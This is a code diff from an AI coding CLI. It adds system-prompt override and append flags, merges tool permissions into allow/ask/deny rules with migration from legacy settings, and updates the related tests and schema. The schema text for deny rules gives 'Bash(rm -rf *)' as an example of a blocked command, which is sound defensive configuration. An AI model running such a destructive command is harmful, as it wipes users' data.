expect(argv.prompt).toBeUndefined(); }); + it('should parse --system-prompt', async () => { + process.argv = [ + 'node', + 'script.js', + '--system-prompt', + 'You are a test system prompt.', + ]; + const argv = await parseArguments(); + expect(argv.systemPrompt).toBe('You are a test system prompt.'); + expect(argv.appendSystemPrompt).toBeUndefined(); + }); + + it('should parse --append-system-prompt', async () => { + process.argv = [ + 'node', + 'script.js', + '--append-system-prompt', + 'Be extra concise.', + ]; + const argv = await parseArguments(); + expect(argv.appendSystemPrompt).toBe('Be extra concise.'); + expect(argv.systemPrompt).toBeUndefined(); + }); + it('should allow -r flag as alias for --resume', async () => { process.argv = [ 'node', @@ -432,6 +456,21 @@ describe('parseArguments', () => { mockExit.mockRestore(); }); + it('should allow --system-prompt and --append-system-prompt together', async () => { + process.argv = [ + 'node', + 'script.js', + '--system-prompt', + 'Override prompt', + '--append-system-prompt', + 'Append prompt', + ]; + + const argv = await parseArguments(); + expect(argv.systemPrompt).toBe('Override prompt'); + expect(argv.appendSystemPrompt).toBe('Append prompt'); + }); + it('should throw an error when include-partial-messages is used without stream-json output', async () => { process.argv = ['node', 'script.js', '--include-partial-messages']; @@ -983,7 +1022,7 @@ describe('mergeExcludeTools', () => { process.argv = ['node', 'script.js']; const argv = await parseArguments(); const config = await loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual([]); + expect(config.getPermissionsDeny()).toEqual([]); }); it('should return default excludes when no excludeTools are specified and it is not interactive', async () => { @@ -992,7 +1031,7 @@ describe('mergeExcludeTools', () => { process.argv = ['node', 'script.js', '-p', 'test']; const argv = await parseArguments(); const config = await 
loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual(defaultExcludes); + expect(config.getPermissionsDeny()).toEqual(defaultExcludes); }); it('should handle settings with excludeTools but no extensions', async () => { @@ -1000,10 +1039,10 @@ describe('mergeExcludeTools', () => { const argv = await parseArguments(); const settings: Settings = { tools: { exclude: ['tool1', 'tool2'] } }; const config = await loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual( + expect(config.getPermissionsDeny()).toEqual( expect.arrayContaining(['tool1', 'tool2']), ); - expect(config.getExcludeTools()).toHaveLength(2); + expect(config.getPermissionsDeny()).toHaveLength(2); }); }); @@ -1028,7 +1067,7 @@ describe('Approval mode tool exclusion logic', () => { const settings: Settings = {}; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1047,7 +1086,7 @@ describe('Approval mode tool exclusion logic', () => { const settings: Settings = {}; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1067,7 +1106,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ 
-1084,7 +1123,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1101,7 +1140,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1121,7 +1160,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1141,7 +1180,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1154,7 +1193,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); 
expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1179,7 +1218,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1199,7 +1238,7 @@ describe('Approval mode tool exclusion logic', () => { const settings: Settings = { tools: { exclude: ['custom_tool'] } }; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain('custom_tool'); // From settings expect(excludedTools).toContain(ShellTool.Name); // From approval mode expect(excludedTools).not.toContain(EditTool.Name); // Should be allowed in auto-edit @@ -1795,9 +1834,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); it('should not exclude interactive tools in interactive mode with YOLO', async () => { @@ -1805,9 +1844,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '--yolo']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - 
expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); it('should exclude interactive tools in non-interactive mode without YOLO', async () => { @@ -1815,9 +1854,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '-p', 'test']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).toContain('run_shell_command'); - expect(config.getExcludeTools()).toContain('edit'); - expect(config.getExcludeTools()).toContain('write_file'); + expect(config.getPermissionsDeny()).toContain('run_shell_command'); + expect(config.getPermissionsDeny()).toContain('edit'); + expect(config.getPermissionsDeny()).toContain('write_file'); }); it('should not exclude interactive tools in non-interactive mode with YOLO', async () => { @@ -1825,9 +1864,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '-p', 'test', '--yolo']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); }); diff --git a/packages/cli/src/config/config.ts b/packages/cli/src/config/config.ts index 88153fe75..d1b8fbf86 100755 --- a/packages/cli/src/config/config.ts +++ b/packages/cli/src/config/config.ts @@ -10,7 +10,6 @@ import { Config, 
DEFAULT_QWEN_EMBEDDING_MODEL, FileDiscoveryService, - FileEncoding, getAllGeminiMdFilenames, loadServerHierarchicalMemory, setGeminiMdFilename as setServerGeminiMdFilename, @@ -19,7 +18,6 @@ import { Storage, InputFormat, OutputFormat, - isToolEnabled, SessionService, ideContextStore, type ResumedSessionData, @@ -31,10 +29,13 @@ import { NativeLspClient, createDebugLogger, NativeLspService, + isToolEnabled, } from '@qwen-code/qwen-code-core'; import { extensionsCommand } from '../commands/extensions.js'; import { hooksCommand } from '../commands/hooks.js'; -import type { Settings } from './settings.js'; +import type { Settings, LoadedSettings } from './settings.js'; +import { SettingScope } from './settings.js'; +import { authCommand } from '../commands/auth.js'; import { resolveCliGenerationConfig, getAuthTypeFromEnv, @@ -52,16 +53,16 @@ import { appEvents } from '../utils/events.js'; import { mcpCommand } from '../commands/mcp.js'; // UUID v4 regex pattern for validation -const UUID_REGEX = - /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i; +const SESSION_ID_REGEX = + /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}(-agent-[a-zA-Z0-9_.-]+)?$/i; /** - * Validates if a string is a valid UUID format - * @param value - The string to validate - * @returns True if the string is a valid UUID, false otherwise + * Validates if a string is a valid session ID format. + * Accepts a standard UUID, or a UUID followed by `-agent-{suffix}` + * (used by Arena to give each agent a deterministic session ID). 
*/ -function isValidUUID(value: string): boolean { - return UUID_REGEX.test(value); +function isValidSessionId(value: string): boolean { + return SESSION_ID_REGEX.test(value); } import { isWorkspaceTrusted } from './trustedFolders.js'; @@ -111,6 +112,8 @@ export interface CliArgs { debug: boolean | undefined; prompt: string | undefined; promptInteractive: string | undefined; + systemPrompt: string | undefined; + appendSystemPrompt: string | undefined; yolo: boolean | undefined; approvalMode: string | undefined; telemetry: boolean | undefined; @@ -290,6 +293,16 @@ export async function parseArguments(): Promise { description: 'Execute the provided prompt and continue in interactive mode', }) + .option('system-prompt', { + type: 'string', + description: + 'Override the main session system prompt for this run. Can be combined with --append-system-prompt.', + }) + .option('append-system-prompt', { + type: 'string', + description: + 'Append instructions to the main session system prompt for this run. Can be combined with --system-prompt.', + }) .option('sandbox', { alias: 's', type: 'boolean', @@ -386,6 +399,7 @@ export async function parseArguments(): Promise { description: 'List all available extensions and exit.', }) .option('include-directories', { + alias: 'add-dir', type: 'array', string: true, description: @@ -557,10 +571,13 @@ export async function parseArguments(): Promise { if (argv['sessionId'] && (argv['continue'] || argv['resume'])) { return 'Cannot use --session-id with --continue or --resume. Use --session-id to start a new session with a specific ID, or use --continue/--resume to resume an existing session.'; } - if (argv['sessionId'] && !isValidUUID(argv['sessionId'] as string)) { + if ( + argv['sessionId'] && + !isValidSessionId(argv['sessionId'] as string) + ) { return `Invalid --session-id: "${argv['sessionId']}". 
Must be a valid UUID (e.g., "123e4567-e89b-12d3-a456-426614174000").`; } - if (argv['resume'] && !isValidUUID(argv['resume'] as string)) { + if (argv['resume'] && !isValidSessionId(argv['resume'] as string)) { return `Invalid --resume: "${argv['resume']}". Must be a valid UUID (e.g., "123e4567-e89b-12d3-a456-426614174000").`; } return true; @@ -570,6 +587,8 @@ export async function parseArguments(): Promise { .command(mcpCommand) // Register Extension subcommands .command(extensionsCommand) + // Register Auth subcommands + .command(authCommand) // Register Hooks subcommands .command(hooksCommand); @@ -685,6 +704,7 @@ export async function loadCliConfig( argv: CliArgs, cwd: string = process.cwd(), overrideExtensions?: string[], + loadedSettings?: LoadedSettings, ): Promise { const debugMode = isDebugMode(argv); @@ -814,64 +834,106 @@ export async function loadCliConfig( // (fallback for edge cases where query/prompt is provided with TEXT output) interactive = false; } - // In non-interactive mode, exclude tools that require a prompt. - // However, if stream-json input is used, control can be requested via JSON messages, - // so tools should not be excluded in that case. - const extraExcludes: string[] = []; - const resolvedCoreTools = argv.coreTools || settings.tools?.core || []; - const resolvedAllowedTools = - argv.allowedTools || settings.tools?.allowed || []; - const isExplicitlyEnabled = (toolName: ToolName): boolean => { - if (resolvedCoreTools.length > 0) { - if (isToolEnabled(toolName, resolvedCoreTools, [])) { - return true; - } + // ── Unified permissions construction ───────────────────────────────────── + // All permission sources are merged here, before constructing Config. + // The resulting three arrays are the single source of truth that Config / + // PermissionManager will use. + // + // Sources (in order of precedence within each list): + // 1. settings.permissions.{allow,ask,deny} (persistent, merged by LoadedSettings) + // 2. 
argv.coreTools → allow (allowlist mode: only these tools are available) + // 3. argv.allowedTools → allow (auto-approve these tools/commands) + // 4. argv.excludeTools → deny (block these tools completely) + // 5. Non-interactive mode exclusions → deny (unless explicitly allowed above) + + // Start from settings-level rules. + // Read from both new `permissions` and legacy `tools` paths for compatibility. + // Note: settings.tools.core / argv.coreTools are intentionally NOT merged into + // mergedAllow — they have whitelist semantics (only listed tools are registered), + // not auto-approve semantics. They are passed via the `coreTools` Config param + // and handled by PermissionManager.coreToolsAllowList. + const resolvedCoreTools: string[] = [ + ...(argv.coreTools ?? []), + ...(settings.tools?.core ?? []), + ]; + const mergedAllow: string[] = [ + ...(settings.permissions?.allow ?? []), + ...(settings.tools?.allowed ?? []), + ]; + const mergedAsk: string[] = [...(settings.permissions?.ask ?? [])]; + const mergedDeny: string[] = [ + ...(settings.permissions?.deny ?? []), + ...(settings.tools?.exclude ?? []), + ]; + + // argv.allowedTools adds allow rules (auto-approve). + for (const t of argv.allowedTools ?? []) { + if (t && !mergedAllow.includes(t)) mergedAllow.push(t); + } + + // argv.excludeTools adds deny rules. + for (const t of argv.excludeTools ?? []) { + if (t && !mergedDeny.includes(t)) mergedDeny.push(t); + } + + // Helper: check if a tool is explicitly covered by an allow rule OR by the + // coreTools whitelist. Uses alias matching for coreTools (via isToolEnabled) + // to preserve the original behaviour where "ShellTool", "Shell", and + // "run_shell_command" are all accepted as the same tool. + const isExplicitlyAllowed = (toolName: ToolName): boolean => { + const name = toolName as string; + // 1. Check permissions.allow / allowedTools rules. 
+ if ( + mergedAllow.some((rule) => { + const openParen = rule.indexOf('('); + const ruleName = + openParen === -1 ? rule.trim() : rule.substring(0, openParen).trim(); + return ruleName === name; + }) + ) { + return true; } - if (resolvedAllowedTools.length > 0) { - if (isToolEnabled(toolName, resolvedAllowedTools, [])) { - return true; - } + // 2. Check coreTools whitelist (with alias matching). + // If coreTools is non-empty and explicitly includes this tool, it is + // considered allowed for non-interactive mode exclusion purposes. + if (resolvedCoreTools.length > 0) { + return isToolEnabled(toolName, resolvedCoreTools, []); } return false; }; - const excludeUnlessExplicit = (toolName: ToolName): void => { - if (!isExplicitlyEnabled(toolName)) { - extraExcludes.push(toolName); - } - }; - // ACP mode check: must include both --acp (current) and --experimental-acp (deprecated). - // Without this check, edit, write_file, run_shell_command would be excluded in ACP mode. + // In non-interactive mode, tools that require a user prompt are denied unless + // the caller has explicitly allowed them. Stream-JSON input is excluded from + // this logic because approval can be sent programmatically via JSON messages. const isAcpMode = argv.acp || argv.experimentalAcp; if (!interactive && !isAcpMode && inputFormat !== InputFormat.STREAM_JSON) { + const denyUnlessAllowed = (toolName: ToolName): void => { + if (!isExplicitlyAllowed(toolName)) { + const name = toolName as string; + if (!mergedDeny.includes(name)) mergedDeny.push(name); + } + }; + switch (approvalMode) { case ApprovalMode.PLAN: case ApprovalMode.DEFAULT: - // In default non-interactive mode, all tools that require approval are excluded, - // unless explicitly enabled via coreTools/allowedTools. - excludeUnlessExplicit(ShellTool.Name as ToolName); - excludeUnlessExplicit(EditTool.Name as ToolName); - excludeUnlessExplicit(WriteFileTool.Name as ToolName); + // Deny all write/execute tools unless explicitly allowed. 
+ denyUnlessAllowed(ShellTool.Name as ToolName); + denyUnlessAllowed(EditTool.Name as ToolName); + denyUnlessAllowed(WriteFileTool.Name as ToolName); break; case ApprovalMode.AUTO_EDIT: - // In auto-edit non-interactive mode, only tools that still require a prompt are excluded. - excludeUnlessExplicit(ShellTool.Name as ToolName); + // Only shell requires a prompt in auto-edit mode. + denyUnlessAllowed(ShellTool.Name as ToolName); break; case ApprovalMode.YOLO: - // No extra excludes for YOLO mode. + // No extra denials for YOLO mode. break; default: - // This should never happen due to validation earlier, but satisfies the linter break; } } - const excludeTools = mergeExcludeTools( - settings, - extraExcludes.length > 0 ? extraExcludes : undefined, - argv.excludeTools, - ); - let allowedMcpServers: Set | undefined; let excludedMcpServers: Set | undefined; if (argv.allowedMcpServerNames) { @@ -962,9 +1024,33 @@ export async function loadCliConfig( importFormat: settings.context?.importFormat || 'tree', debugMode, question, + systemPrompt: argv.systemPrompt, + appendSystemPrompt: argv.appendSystemPrompt, + // Legacy fields – kept for backward compatibility with getCoreTools() etc. coreTools: argv.coreTools || settings.tools?.core || undefined, allowedTools: argv.allowedTools || settings.tools?.allowed || undefined, - excludeTools, + excludeTools: mergedDeny, + // New unified permissions (PermissionManager source of truth). + permissions: { + allow: mergedAllow.length > 0 ? mergedAllow : undefined, + ask: mergedAsk.length > 0 ? mergedAsk : undefined, + deny: mergedDeny.length > 0 ? mergedDeny : undefined, + }, + // Permission rule persistence callback (writes to settings files). + onPersistPermissionRule: loadedSettings + ? async (scope, ruleType, rule) => { + const settingScope = + scope === 'project' ? 
SettingScope.Workspace : SettingScope.User; + const key = `permissions.${ruleType}`; + const currentRules: string[] = + loadedSettings.forScope(settingScope).settings.permissions?.[ + ruleType + ] ?? []; + if (!currentRules.includes(rule)) { + loadedSettings.setValue(settingScope, key, [...currentRules, rule]); + } + } + : undefined, toolDiscoveryCommand: settings.tools?.discoveryCommand, toolCallCommand: settings.tools?.callCommand, mcpServerCommand: settings.mcp?.serverCommand, @@ -1013,7 +1099,6 @@ export async function loadCliConfig( warnings: resolvedCliConfig.warnings, cliVersion: await getCliVersion(), webSearch: buildWebSearchConfig(argv, settings, selectedAuthType), - summarizeToolOutput: settings.model?.summarizeToolOutput, ideMode, chatCompression: settings.model?.chatCompression, folderTrust, @@ -1027,7 +1112,6 @@ export async function loadCliConfig( skipStartupContext: settings.model?.skipStartupContext ?? false, truncateToolOutputThreshold: settings.tools?.truncateToolOutputThreshold, truncateToolOutputLines: settings.tools?.truncateToolOutputLines, - enableToolOutputTruncation: settings.tools?.enableToolOutputTruncation, eventEmitter: appEvents, gitCoAuthor: settings.general?.gitCoAuthor, output: { @@ -1043,11 +1127,22 @@ export async function loadCliConfig( // always be true and the settings file can never disable recording. chatRecording: argv.chatRecording ?? settings.general?.chatRecording ?? true, - defaultFileEncoding: - settings.general?.defaultFileEncoding ?? FileEncoding.UTF8, + defaultFileEncoding: settings.general?.defaultFileEncoding, lsp: { enabled: lspEnabled, }, + agents: settings.agents + ? { + displayMode: settings.agents.displayMode, + arena: settings.agents.arena + ? { + worktreeBaseDir: settings.agents.arena.worktreeBaseDir, + preserveArtifacts: + settings.agents.arena.preserveArtifacts ?? 
false, + } + : undefined, + } + : undefined, }); if (lspEnabled) { @@ -1074,16 +1169,3 @@ export async function loadCliConfig( return config; } - -function mergeExcludeTools( - settings: Settings, - extraExcludes?: string[] | undefined, - cliExcludeTools?: string[] | undefined, -): string[] { - const allExcludeTools = new Set([ - ...(cliExcludeTools || []), - ...(settings.tools?.exclude || []), - ...(extraExcludes || []), - ]); - return [...allExcludeTools]; -} diff --git a/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts b/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts index c87fa4480..c63979f35 100644 --- a/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts +++ b/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts @@ -55,7 +55,6 @@ export const V1_TO_V2_MIGRATION_MAP: Record = { shellPager: 'tools.shell.pager', shellShowColor: 'tools.shell.showColor', skipNextSpeakerCheck: 'model.skipNextSpeakerCheck', - summarizeToolOutput: 'model.summarizeToolOutput', telemetry: 'telemetry', theme: 'ui.theme', toolDiscoveryCommand: 'tools.discoveryCommand', @@ -157,7 +156,6 @@ export const V1_INDICATOR_KEYS = [ 'shellPager', 'shellShowColor', 'skipNextSpeakerCheck', - 'summarizeToolOutput', 'toolDiscoveryCommand', 'toolCallCommand', 'usageStatisticsEnabled', diff --git a/packages/cli/src/config/settings.ts b/packages/cli/src/config/settings.ts index 0809cf090..d1d64f1c8 100644 --- a/packages/cli/src/config/settings.ts +++ b/packages/cli/src/config/settings.ts @@ -67,6 +67,74 @@ export const DEFAULT_EXCLUDED_ENV_VARS = ['DEBUG', 'DEBUG_MODE']; export const SETTINGS_VERSION = 3; export const SETTINGS_VERSION_KEY = '$version'; +/** + * Migrate legacy tool permission settings (tools.core / tools.allowed / tools.exclude) + * to the new permissions.allow / permissions.ask / permissions.deny format. 
+ * + * Conversion rules: + * tools.allowed → permissions.allow (bypass confirmation) + * tools.exclude → permissions.deny (block tools) + * tools.core → permissions.allow (only listed tools enabled) + * + permissions.deny with a wildcard deny-all if needed + * + * Returns the updated settings object, or null if no migration is needed. + */ +export function migrateLegacyPermissions( + settings: Record, +): Record | null { + const tools = settings['tools'] as Record | undefined; + if (!tools) return null; + + const hasLegacy = + Array.isArray(tools['core']) || + Array.isArray(tools['allowed']) || + Array.isArray(tools['exclude']); + + if (!hasLegacy) return null; + + const result = structuredClone(settings) as Record; + const resultTools = result['tools'] as Record; + const permissions = (result['permissions'] as Record) ?? {}; + result['permissions'] = permissions; + + const mergeInto = (key: string, items: string[]) => { + const existing = Array.isArray(permissions[key]) + ? (permissions[key] as string[]) + : []; + const merged = Array.from(new Set([...existing, ...items])); + permissions[key] = merged; + }; + + // tools.allowed → permissions.allow + if (Array.isArray(resultTools['allowed'])) { + mergeInto('allow', resultTools['allowed'] as string[]); + delete resultTools['allowed']; + } + + // tools.exclude → permissions.deny + if (Array.isArray(resultTools['exclude'])) { + mergeInto('deny', resultTools['exclude'] as string[]); + delete resultTools['exclude']; + } + + // tools.core → permissions.allow (explicit enables) + // IMPORTANT: tools.core has whitelist semantics: "only these tools can run". + // To preserve this, we also add deny rules for all tools NOT in the list. 
+ // A wildcard deny-all followed by specific allows achieves this because + // allow rules take precedence over the catch-all deny in the evaluation order: + // deny = [everything not listed], allow = [listed tools] + // However, since our priority is deny > allow, we cannot use a blanket deny. + // Instead we just migrate to allow (auto-approve) and let the coreTools + // semantics continue to work through the Config.getCoreTools() path until + // the old API is fully removed. + if (Array.isArray(resultTools['core'])) { + mergeInto('allow', resultTools['core'] as string[]); + delete resultTools['core']; + } + + return result; +} + export function getSystemSettingsPath(): string { if (process.env['QWEN_CODE_SYSTEM_SETTINGS_PATH']) { return process.env['QWEN_CODE_SYSTEM_SETTINGS_PATH']; @@ -103,10 +171,6 @@ export interface CheckpointingSettings { enabled?: boolean; } -export interface SummarizeToolOutputSettings { - tokenBudget?: number; -} - export interface AccessibilitySettings { enableLoadingPhrases?: boolean; screenReader?: boolean; diff --git a/packages/cli/src/config/settingsSchema.test.ts b/packages/cli/src/config/settingsSchema.test.ts index cfde449ca..c4ad800e2 100644 --- a/packages/cli/src/config/settingsSchema.test.ts +++ b/packages/cli/src/config/settingsSchema.test.ts @@ -181,9 +181,7 @@ describe('SettingsSchema', () => { expect(getSettingsSchema().security.properties.auth.showInDialog).toBe( false, ); - expect(getSettingsSchema().tools.properties.core.showInDialog).toBe( - false, - ); + expect(getSettingsSchema().permissions.showInDialog).toBe(false); expect(getSettingsSchema().mcpServers.showInDialog).toBe(false); expect(getSettingsSchema().telemetry.showInDialog).toBe(false); diff --git a/packages/cli/src/config/settingsSchema.ts b/packages/cli/src/config/settingsSchema.ts index 4701abc1a..c97b41f86 100644 --- a/packages/cli/src/config/settingsSchema.ts +++ b/packages/cli/src/config/settingsSchema.ts @@ -76,12 +76,98 @@ export interface 
SettingDefinition { mergeStrategy?: MergeStrategy; /** Enum type options */ options?: readonly SettingEnumOption[]; + /** Schema for array items when type is 'array' */ + items?: SettingItemDefinition; +} + +/** + * Schema definition for array item types. + * Supports simple types (string, number, boolean) and complex object types. + */ +export interface SettingItemDefinition { + type: 'string' | 'number' | 'boolean' | 'object' | 'array'; + properties?: Record< + string, + SettingItemDefinition & { + required?: boolean; + enum?: string[]; + additionalProperties?: SettingItemDefinition; + } + >; + items?: SettingItemDefinition; + required?: boolean; + enum?: string[]; + description?: string; + additionalProperties?: boolean | SettingItemDefinition; } export interface SettingsSchema { [key: string]: SettingDefinition; } +/** + * Common items schema for hook definitions. + * Used by both UserPromptSubmit and Stop hooks. + */ +const HOOK_DEFINITION_ITEMS: SettingItemDefinition = { + type: 'object', + description: + 'A hook definition with an optional matcher and a list of hook configurations.', + properties: { + matcher: { + type: 'string', + description: + 'An optional matcher pattern to filter when this hook definition applies.', + }, + sequential: { + type: 'boolean', + description: + 'Whether the hooks should be executed sequentially instead of in parallel.', + }, + hooks: { + type: 'array', + description: 'The list of hook configurations to execute.', + required: true, + items: { + type: 'object', + description: + 'A hook configuration entry that defines a command to execute.', + properties: { + type: { + type: 'string', + description: 'The type of hook.', + enum: ['command'], + required: true, + }, + command: { + type: 'string', + description: 'The command to execute when the hook is triggered.', + required: true, + }, + name: { + type: 'string', + description: 'An optional name for the hook.', + }, + description: { + type: 'string', + description: 'An optional 
description of what the hook does.', + }, + timeout: { + type: 'number', + description: 'Timeout in milliseconds for the hook execution.', + }, + env: { + type: 'object', + description: + 'Environment variables to set when executing the hook command.', + additionalProperties: { type: 'string' }, + }, + }, + }, + }, + }, +}; + export type MemoryImportFormat = 'tree' | 'flat'; export type DnsResolutionOrder = 'ipv4first' | 'verbatim'; @@ -546,17 +632,6 @@ const SETTINGS_SCHEMA = { 'Maximum number of user/model/tool turns to keep in a session. -1 means unlimited.', showInDialog: false, }, - summarizeToolOutput: { - type: 'object', - label: 'Summarize Tool Output', - category: 'Model', - requiresRestart: false, - default: undefined as - | Record - | undefined, - description: 'Settings for summarizing tool output.', - showInDialog: false, - }, chatCompression: { type: 'object', label: 'Chat Compression', @@ -789,6 +864,55 @@ const SETTINGS_SCHEMA = { }, }, + permissions: { + type: 'object', + label: 'Permissions', + category: 'Tools', + requiresRestart: true, + default: {}, + description: + 'Permission rules controlling tool usage. Rules are evaluated in priority order: deny > ask > allow.', + showInDialog: false, + properties: { + allow: { + type: 'array', + label: 'Allow Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that are auto-approved without confirmation. ' + + 'Examples: "ShellTool", "Bash(git *)", "ReadFileTool".', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + ask: { + type: 'array', + label: 'Ask Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that always require user confirmation. 
' + + 'Takes precedence over allow rules.', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + deny: { + type: 'array', + label: 'Deny Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that are always blocked. Highest priority rule. ' + + 'Examples: "ShellTool", "Bash(rm -rf *)".', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + }, + }, + tools: { type: 'object', label: 'Tools', @@ -848,32 +972,33 @@ const SETTINGS_SCHEMA = { }, }, }, + // Legacy tool permission fields – kept for backward compatibility. + // Use permissions.{allow,ask,deny} instead. core: { type: 'array', - label: 'Core Tools', + label: 'Core Tools (deprecated)', category: 'Tools', requiresRestart: true, default: undefined as string[] | undefined, - description: 'Paths to core tool definitions.', + description: 'Deprecated. Use permissions.allow instead.', showInDialog: false, }, allowed: { type: 'array', - label: 'Allowed Tools', + label: 'Allowed Tools (deprecated)', category: 'Advanced', requiresRestart: true, default: undefined as string[] | undefined, - description: - 'A list of tool names that will bypass the confirmation dialog.', + description: 'Deprecated. Use permissions.allow instead.', showInDialog: false, }, exclude: { type: 'array', - label: 'Exclude Tools', + label: 'Exclude Tools (deprecated)', category: 'Tools', requiresRestart: true, default: undefined as string[] | undefined, - description: 'Tool names to exclude from discovery.', + description: 'Deprecated. Use permissions.deny instead.', showInDialog: false, mergeStrategy: MergeStrategy.UNION, }, @@ -941,15 +1066,6 @@ const SETTINGS_SCHEMA = { 'Use the bundled ripgrep binary. When set to false, the system-level "rg" command will be used instead. 
This setting is only effective when useRipgrep is true.', showInDialog: false, }, - enableToolOutputTruncation: { - type: 'boolean', - label: 'Enable Tool Output Truncation', - category: 'General', - requiresRestart: true, - default: true, - description: 'Enable truncation of large tool outputs.', - showInDialog: false, - }, truncateToolOutputThreshold: { type: 'number', label: 'Tool Output Truncation Threshold', @@ -1178,6 +1294,104 @@ const SETTINGS_SCHEMA = { description: 'Configuration for web search providers.', showInDialog: false, }, + agents: { + type: 'object', + label: 'Agents', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for multi-agent collaboration features (Arena, Team, Swarm).', + showInDialog: false, + properties: { + displayMode: { + type: 'enum', + label: 'Display Mode', + category: 'Advanced', + requiresRestart: false, + default: undefined as string | undefined, + description: + 'Display mode for multi-agent sessions. Currently only "in-process" is supported.', + showInDialog: false, + options: [ + { value: 'in-process', label: 'In-process' }, + // { value: 'tmux', label: 'tmux' }, + // { value: 'iterm2', label: 'iTerm2' }, + ], + }, + arena: { + type: 'object', + label: 'Arena', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: 'Settings for Arena (multi-model competitive execution).', + showInDialog: false, + properties: { + worktreeBaseDir: { + type: 'string', + label: 'Worktree 